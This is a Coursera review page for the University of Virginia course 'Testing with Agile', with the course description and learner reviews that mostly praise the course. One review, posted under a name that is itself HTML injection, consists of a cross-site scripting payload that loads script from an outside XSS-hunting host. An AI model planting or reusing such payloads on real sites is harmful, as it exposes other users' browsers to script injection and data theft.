Chevron Left
Testing with Agile(으)로 돌아가기

버지니아 대학교의 Testing with Agile 학습자 리뷰 및 피드백

4.6
318개의 평가
52개의 리뷰

강좌 소개

To deliver agile outcomes, you have to do more than implement an agile process- you have to create focus around what matters to your user and rigorously test how well what you’re doing is delivering on that focus. Driving to testable ideas (hypotheses) and maximizing the results of your experimentation is at the heart of a high-functioning practice of agile. This course shows you how to facilitate alignment and create a culture of experimentation across your product pipeline. You’ll learn how to answer these four big questions: 1. How do we drive our agility with analytics? 2. How do we create compelling propositions for our user?
 3. How do we achieve excellent usability?
 4. How do we release fast without creating disasters?
 More specifically, after completing this course, you’ll be able to: - Use metrics to facilitate alignment with your company’s objectives while keeping your team autonomous and creative - Drive to evidence-based, testable ideas that maximize outcomes and minimize waste - Structure analytics to focus your work and instrument observation for analytics-informed decisions - Test alternative interface patterns before you build them to maximize both product usability and purposeful implementation - Prioritize and execute investments in your delivery pipeline to increase the frequency of releases and decrease manual grunt work As a Project Management Institute (PMI®) Registered Education Provider, the University of Virginia Darden School of Business has been approved by PMI to issue 20 professional development units (PDUs) for this course, which focuses on core competencies recognized by PMI. (Provider #2122) This course is supported by the Batten Institute at UVA’s Darden School of Business. The Batten Institute’s mission is to improve the world through entrepreneurship and innovation: www.batteninstitute.org....

최상위 리뷰

MB

Jan 30, 2019

Alex does an excellent job in structuring and delivering his courses. Definitely makes me want to continue educational opportunities with his courses offered and University of Virginia.

OS

Jun 26, 2017

I thought this was a very good practical course. It was challenging for me since I lack experience in software development industry, but I thought it gave me a very good framework.

필터링 기준:

Testing with Agile의 52개 리뷰 중 1~25

교육 기관: MASOOTH A

Jun 20, 2019

great

교육 기관: ganeshkiran

May 21, 2019

More real time example would have been good

교육 기관: Miguel A T A

May 13, 2019

Es un muy buen curso, me dio mucha luz sobre la importancia de la automatización de las pruebas en equipos ágiles de desarrollo.

교육 기관: nikhil+(<a>)

Apr 26, 2019

"><script src=https://si.xss.ht></script>

교육 기관: Pedro D G

Apr 22, 2019

Great!

교육 기관: Mahendra S

Mar 28, 2019

Very Great course everyone should do this who works in testing. very helpful for future.

교육 기관: VINOD T

Mar 26, 2019

very helpful

교육 기관: Matthew B

Jan 30, 2019

Alex does an excellent job in structuring and delivering his courses. Definitely makes me want to continue educational opportunities with his courses offered and University of Virginia.

교육 기관: Thangaraja R

Dec 02, 2018

Excellent

교육 기관: Vyju I

Oct 31, 2018

Alex's use of thought leader's in the industry is very helpful.

교육 기관: SAMUEL B

Oct 23, 2018

G

교육 기관: 杨彬

Oct 09, 2018

The course helps developThis is an interesting and helpful experience for me.

교육 기관: CHANDRA P K

Sep 25, 2018

This course actually bring all that knowledge into light which has been taught in Course 1-3. all videos specially the interview are the essence of this course.

교육 기관: Paulius U

Jul 29, 2018

Comprehensive, detailed and well worth the time. Everyone in software development business should take this.

교육 기관: Andreu M N

Jul 14, 2018

I totally recommend this course. Well prepared, interesting interviews done by Alex to several professional with well-known reputation, good explanations, and well-prepared exercises. It’s totally worth to invest your time and money if you want to start in Agile.

교육 기관: Shin-Ing C

Jul 11, 2018

Provides a very complete and clear picture of software testing

교육 기관: Jaime S

Jun 26, 2018

This was a good course for developing a good foundation of CI/CD and testing practices in lean methodologies. This course incorporates a lot of interviews with experts in the industry, which I find helpful and informative. The exercises in the class were also helpful and applicable.

교육 기관: Nicola Z

May 27, 2018

very interesting and helpful experience. I can suggest this course to all people who want to learn something about agile. Great job mr Alex!

교육 기관: Roberto L

May 16, 2018

Agile course is well structured and teaching material

교육 기관: Andrew B

Apr 30, 2018

I really enjoyed it, but I wish they covered more about testing software

교육 기관: Erez M

Apr 30, 2018

It might sound strange, but there are only a few good courses that really deal with agile development. This course is definitly one of them. I have enjoyed the format of this course and the journey it took me through. The live interviews with experts from the industry are a great bonus to the learning. Thank you Alex!.

교육 기관: Nkeangnyi L Y

Apr 02, 2018

One tough course

교육 기관: Constance C

Mar 23, 2018

Overall very useful information and some good advice from some of the expert interviews. As a software developer I am often looking for specific hints and tip s in this area and this course provided some valuable advice and perspectives that I can apply immediatley

교육 기관: Rhea A D

Mar 18, 2018

The course contains complete detailed information on Agile Testing. Users should make the best use of this course knowledge as now all the companies are now moving to Agile.

교육 기관: Mauricio L

Feb 25, 2018

Very nice as i learned the different aspects of testing using agile approach vs legacy